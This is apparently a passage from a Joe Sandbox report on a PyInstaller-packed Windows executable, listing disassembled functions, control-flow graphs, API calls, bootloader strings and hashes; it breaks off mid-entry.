                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName
                                                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                    • API String ID: 514040917-585287483
                                                                                                    • Opcode ID: c5d5e495bd61fe344249f7605fb933625fa15eb8c761ae1beab3e43f7f417bc2
                                                                                                    • Instruction ID: bde7d7aa7b3e13d47e0e1640368fcfe0862a14d4bc14e43a798d12d16ef09090
                                                                                                    • Opcode Fuzzy Hash: c5d5e495bd61fe344249f7605fb933625fa15eb8c761ae1beab3e43f7f417bc2
                                                                                                    • Instruction Fuzzy Hash: 2EF15C21B08682D1FA1DFF21B5543B9E271AF54790FE44432DA5D83AD6EF2CE95AC320

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 359 7ff7691c5c74-7ff7691c5ce7 call 7ff7691c59a8 362 7ff7691c5d01-7ff7691c5d0b call 7ff7691b7830 359->362 363 7ff7691c5ce9-7ff7691c5cf2 call 7ff7691b43d4 359->363 369 7ff7691c5d26-7ff7691c5d8f CreateFileW 362->369 370 7ff7691c5d0d-7ff7691c5d24 call 7ff7691b43d4 call 7ff7691b43f4 362->370 368 7ff7691c5cf5-7ff7691c5cfc call 7ff7691b43f4 363->368 386 7ff7691c6042-7ff7691c6062 368->386 371 7ff7691c5d91-7ff7691c5d97 369->371 372 7ff7691c5e0c-7ff7691c5e17 GetFileType 369->372 370->368 376 7ff7691c5dd9-7ff7691c5e07 GetLastError call 7ff7691b4368 371->376 377 7ff7691c5d99-7ff7691c5d9d 371->377 379 7ff7691c5e6a-7ff7691c5e71 372->379 380 7ff7691c5e19-7ff7691c5e54 GetLastError call 7ff7691b4368 CloseHandle 372->380 376->368 377->376 384 7ff7691c5d9f-7ff7691c5dd7 CreateFileW 377->384 382 7ff7691c5e73-7ff7691c5e77 379->382 383 7ff7691c5e79-7ff7691c5e7c 379->383 380->368 394 7ff7691c5e5a-7ff7691c5e65 call 7ff7691b43f4 380->394 389 7ff7691c5e82-7ff7691c5ed7 call 7ff7691b7748 382->389 383->389 390 7ff7691c5e7e 383->390 384->372 384->376 398 7ff7691c5ef6-7ff7691c5f27 call 7ff7691c5728 389->398 399 7ff7691c5ed9-7ff7691c5ee5 call 7ff7691c5bb0 389->399 390->389 394->368 404 7ff7691c5f29-7ff7691c5f2b 398->404 405 7ff7691c5f2d-7ff7691c5f6f 398->405 399->398 406 7ff7691c5ee7 399->406 407 7ff7691c5ee9-7ff7691c5ef1 call 7ff7691b9dd0 404->407 408 7ff7691c5f91-7ff7691c5f9c 405->408 409 7ff7691c5f71-7ff7691c5f75 405->409 406->407 407->386 411 7ff7691c5fa2-7ff7691c5fa6 408->411 412 7ff7691c6040 408->412 409->408 410 7ff7691c5f77-7ff7691c5f8c 409->410 410->408 411->412 414 7ff7691c5fac-7ff7691c5ff1 CloseHandle CreateFileW 411->414 412->386 416 7ff7691c6026-7ff7691c603b 414->416 417 7ff7691c5ff3-7ff7691c6021 GetLastError call 7ff7691b4368 call 7ff7691b7970 414->417 416->412 417->416
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                    • Instruction ID: af3ee9bd4c262c801d871cd97e80b7e2da0c3bc77c77e1909c4ccdb5f8225516
                                                                                                    • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                    • Instruction Fuzzy Hash: D9C1C132B28A45C6EB18EF68E4802BC7771FB49B98B610225DA2E977D5CF3CD051C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                    • Instruction ID: 28785ceea2b0b0f30b8a138418f6573cebbaab0393ddc1dbf0bfad79a0c637e8
                                                                                                    • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                    • Instruction Fuzzy Hash: B8F0C832A18681C7F7649F60B449366B3B0AB44338F944335D96E02AD4CF3CD459CA00

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 179 7ff7691a18f0-7ff7691a192b call 7ff7691a3f70 182 7ff7691a1bc1-7ff7691a1be5 call 7ff7691ab870 179->182 183 7ff7691a1931-7ff7691a1971 call 7ff7691a76a0 179->183 188 7ff7691a1977-7ff7691a1987 call 7ff7691af9f4 183->188 189 7ff7691a1bae-7ff7691a1bb1 call 7ff7691af36c 183->189 194 7ff7691a19a1-7ff7691a19bd call 7ff7691af6bc 188->194 195 7ff7691a1989-7ff7691a199c call 7ff7691a2760 188->195 193 7ff7691a1bb6-7ff7691a1bbe 189->193 193->182 200 7ff7691a19bf-7ff7691a19d2 call 7ff7691a2760 194->200 201 7ff7691a19d7-7ff7691a19ec call 7ff7691b4154 194->201 195->189 200->189 206 7ff7691a1a06-7ff7691a1a87 call 7ff7691a1bf0 * 2 call 7ff7691af9f4 201->206 207 7ff7691a19ee-7ff7691a1a01 call 7ff7691a2760 201->207 215 7ff7691a1a8c-7ff7691a1a9f call 7ff7691b4170 206->215 207->189 218 7ff7691a1aa1-7ff7691a1ab4 call 7ff7691a2760 215->218 219 7ff7691a1ab9-7ff7691a1ad2 call 7ff7691af6bc 215->219 218->189 224 7ff7691a1ad4-7ff7691a1ae7 call 7ff7691a2760 219->224 225 7ff7691a1aec-7ff7691a1b08 call 7ff7691af430 219->225 224->189 230 7ff7691a1b0a-7ff7691a1b16 call 7ff7691a25f0 225->230 231 7ff7691a1b1b-7ff7691a1b29 225->231 230->189 231->189 233 7ff7691a1b2f-7ff7691a1b3e 231->233 235 7ff7691a1b40-7ff7691a1b46 233->235 236 7ff7691a1b60-7ff7691a1b6f 235->236 237 7ff7691a1b48-7ff7691a1b55 235->237 236->236 238 7ff7691a1b71-7ff7691a1b7a 236->238 237->238 239 7ff7691a1b8f 238->239 240 7ff7691a1b7c-7ff7691a1b7f 238->240 242 7ff7691a1b91-7ff7691a1bac 239->242 240->239 241 7ff7691a1b81-7ff7691a1b84 240->241 241->239 243 7ff7691a1b86-7ff7691a1b89 241->243 242->189 242->235 243->239 244 7ff7691a1b8b-7ff7691a1b8d 243->244 244->242
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock$Message
                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                    • API String ID: 677216364-3497178890
                                                                                                    • Opcode ID: f66987a484dbaa53c5a926167477fdbe970f3f776ab65a7504d21796d5ee8852
                                                                                                    • Instruction ID: 6e817fb7fd7a4d2593f2607697d9b8ea0804b25ccb16239f813aec2121c207b8
                                                                                                    • Opcode Fuzzy Hash: f66987a484dbaa53c5a926167477fdbe970f3f776ab65a7504d21796d5ee8852
                                                                                                    • Instruction Fuzzy Hash: A5719371A18686C9EB28EF15F4502B9A3B1FB44784FE44035D98D87B99EE2CE945CB20

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                    • API String ID: 2030045667-3659356012
                                                                                                    • Opcode ID: dcac176b47ad8788345011f3d6c0bf7ad26d14789bd120509890e862367161fe
                                                                                                    • Instruction ID: 3795d5a3172879acb87a804f979797337d372a63ce1e00726d208c8a7d4166f7
                                                                                                    • Opcode Fuzzy Hash: dcac176b47ad8788345011f3d6c0bf7ad26d14789bd120509890e862367161fe
                                                                                                    • Instruction Fuzzy Hash: 7D416E21B08642C1EA28BF26B8405BAE3B0FF45BD4FE44432DE5E57E95EE3CE9418710

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                    • API String ID: 2030045667-2813020118
                                                                                                    • Opcode ID: 7cbe84d2c41071a976958ab209a82948c2858f1d448497253cedd7a1cd3329ad
                                                                                                    • Instruction ID: afbe93d9745f3c213c613500cf7cb2aee57ed989e43ba1029df23616921d1b8e
                                                                                                    • Opcode Fuzzy Hash: 7cbe84d2c41071a976958ab209a82948c2858f1d448497253cedd7a1cd3329ad
                                                                                                    • Instruction Fuzzy Hash: B751E462A08642C1E669BF16B8503BAA2A1BF457A4FE44135ED4D47FD5EF3CE901C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE19C
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE1A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3013587201-537541572
                                                                                                    • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                    • Instruction ID: 06273b36a89951c0c3bee4e0ab3ca8dae2d5714d0e4321fdd823760d49318c3a
                                                                                                    • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                    • Instruction Fuzzy Hash: D041A221B19A02C1EB19EF16B800675A3B6BF45BA0FB84135DD1E97788EE3CE505C7A0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 755 7ff7691bad6c-7ff7691bad92 756 7ff7691bad94-7ff7691bada8 call 7ff7691b43d4 call 7ff7691b43f4 755->756 757 7ff7691badad-7ff7691badb1 755->757 771 7ff7691bb19e 756->771 758 7ff7691bb187-7ff7691bb193 call 7ff7691b43d4 call 7ff7691b43f4 757->758 759 7ff7691badb7-7ff7691badbe 757->759 778 7ff7691bb199 call 7ff7691b9bf0 758->778 759->758 761 7ff7691badc4-7ff7691badf2 759->761 761->758 764 7ff7691badf8-7ff7691badff 761->764 767 7ff7691bae01-7ff7691bae13 call 7ff7691b43d4 call 7ff7691b43f4 764->767 768 7ff7691bae18-7ff7691bae1b 764->768 767->778 774 7ff7691bae21-7ff7691bae27 768->774 775 7ff7691bb183-7ff7691bb185 768->775 776 7ff7691bb1a1-7ff7691bb1b8 771->776 774->775 779 7ff7691bae2d-7ff7691bae30 774->779 775->776 778->771 779->767 782 7ff7691bae32-7ff7691bae57 779->782 784 7ff7691bae8a-7ff7691bae91 782->784 785 7ff7691bae59-7ff7691bae5b 782->785 786 7ff7691bae66-7ff7691bae7d call 7ff7691b43d4 call 7ff7691b43f4 call 7ff7691b9bf0 784->786 787 7ff7691bae93-7ff7691baebb call 7ff7691bc90c call 7ff7691b9c58 * 2 784->787 788 7ff7691bae82-7ff7691bae88 785->788 789 7ff7691bae5d-7ff7691bae64 785->789 817 7ff7691bb010 786->817 820 7ff7691baed8-7ff7691baf03 call 7ff7691bb594 787->820 821 7ff7691baebd-7ff7691baed3 call 7ff7691b43f4 call 7ff7691b43d4 787->821 791 7ff7691baf08-7ff7691baf1f 788->791 789->786 789->788 794 7ff7691baf21-7ff7691baf29 791->794 795 7ff7691baf9a-7ff7691bafa4 call 7ff7691c2c2c 791->795 794->795 799 7ff7691baf2b-7ff7691baf2d 794->799 806 7ff7691bafaa-7ff7691bafbf 795->806 807 7ff7691bb02e 795->807 799->795 803 7ff7691baf2f-7ff7691baf45 799->803 803->795 808 7ff7691baf47-7ff7691baf53 803->808 806->807 812 7ff7691bafc1-7ff7691bafd3 GetConsoleMode 806->812 810 7ff7691bb033-7ff7691bb053 ReadFile 807->810 808->795 813 7ff7691baf55-7ff7691baf57 808->813 815 7ff7691bb059-7ff7691bb061 810->815 816 7ff7691bb14d-7ff7691bb156 GetLastError 810->816 812->807 818 7ff7691bafd5-7ff7691bafdd 812->818 813->795 819 7ff7691baf59-7ff7691baf71 813->819 815->816 823 7ff7691bb067 815->823 826 7ff7691bb173-7ff7691bb176 816->826 827 7ff7691bb158-7ff7691bb16e call 7ff7691b43f4 call 7ff7691b43d4 816->827 828 7ff7691bb013-7ff7691bb01d call 7ff7691b9c58 817->828 818->810 825 7ff7691bafdf-7ff7691bb001 ReadConsoleW 818->825 819->795 829 7ff7691baf73-7ff7691baf7f 819->829 820->791 821->817 833 7ff7691bb06e-7ff7691bb083 823->833 835 7ff7691bb022-7ff7691bb02c 825->835 836 7ff7691bb003 GetLastError 825->836 830 7ff7691bb009-7ff7691bb00b call 7ff7691b4368 826->830 831 7ff7691bb17c-7ff7691bb17e 826->831 827->817 828->776 829->795 839 7ff7691baf81-7ff7691baf83 829->839 830->817 831->828 833->828 842 7ff7691bb085-7ff7691bb090 833->842 835->833 836->830 839->795 840 7ff7691baf85-7ff7691baf95 839->840 840->795 847 7ff7691bb092-7ff7691bb0ab call 7ff7691ba984 842->847 848 7ff7691bb0b7-7ff7691bb0bf 842->848 855 7ff7691bb0b0-7ff7691bb0b2 847->855 851 7ff7691bb0c1-7ff7691bb0d3 848->851 852 7ff7691bb13b-7ff7691bb148 call 7ff7691ba7c4 848->852 856 7ff7691bb0d5 851->856 857 7ff7691bb12e-7ff7691bb136 851->857 852->855 855->828 859 7ff7691bb0da-7ff7691bb0e1 856->859 857->828 860 7ff7691bb0e3-7ff7691bb0e7 859->860 861 7ff7691bb11d-7ff7691bb128 859->861 862 7ff7691bb103 860->862 863 7ff7691bb0e9-7ff7691bb0f0 860->863 861->857 864 7ff7691bb109-7ff7691bb119 862->864 863->862 865 7ff7691bb0f2-7ff7691bb0f6 863->865 864->859 867 7ff7691bb11b 864->867 865->862 866 7ff7691bb0f8-7ff7691bb101 865->866 866->864 867->857
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                    • Instruction ID: fdff0f622d5cce48fc36476010f4086c5bf72174902ca68bb17410ab2a2f49db
                                                                                                    • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                    • Instruction Fuzzy Hash: 4FC1E862A0C687D1E769BF15B4802BDB7B2EB90B90FB54131DA5E03B99CE7CE445C320

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7691A3534), ref: 00007FF7691A3411
                                                                                                      • Part of subcall function 00007FF7691A29E0: GetLastError.KERNEL32(?,?,?,00007FF7691A342E,?,00007FF7691A3534), ref: 00007FF7691A2A14
                                                                                                      • Part of subcall function 00007FF7691A29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7691A342E), ref: 00007FF7691A2A7D
                                                                                                      • Part of subcall function 00007FF7691A29E0: MessageBoxW.USER32 ref: 00007FF7691A2ACF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                    • API String ID: 517058245-2863816727
                                                                                                    • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                    • Instruction ID: 2ded2b5c2a0a65581fc44a5f1b382f551ecfc8286e63e2e85760f546e75e70da
                                                                                                    • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                    • Instruction Fuzzy Hash: 4221A461F08642D1FE2ABF25F8113B9D270BF48394FE00532D65D869E5EE2CE906C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279662727-0
                                                                                                    • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                    • Instruction ID: c2eeb7f67fa1e534e526dd6ba652d07add4fafd3948086991fac0e0a2c5cdccf
                                                                                                    • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                    • Instruction Fuzzy Hash: 3141A422E18782C3F758AF21A550379A271FB98764F60D334E69D03AD9DF7CA1E08720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3251591375-0
                                                                                                    • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                    • Instruction ID: bfec92e3096652305083d854b917d71b81dec52d2203318917b55f33305ec71f
                                                                                                    • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                    • Instruction Fuzzy Hash: 7C313815A4C243C2FE1DBF64B6513B9A2B19F41784FE44035E90E8BAD7DE2CAC04C675
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                    • Instruction ID: 10f045a32a5edf8b4d635272e143ea51e5789b26839b77cb43b70708e02479d1
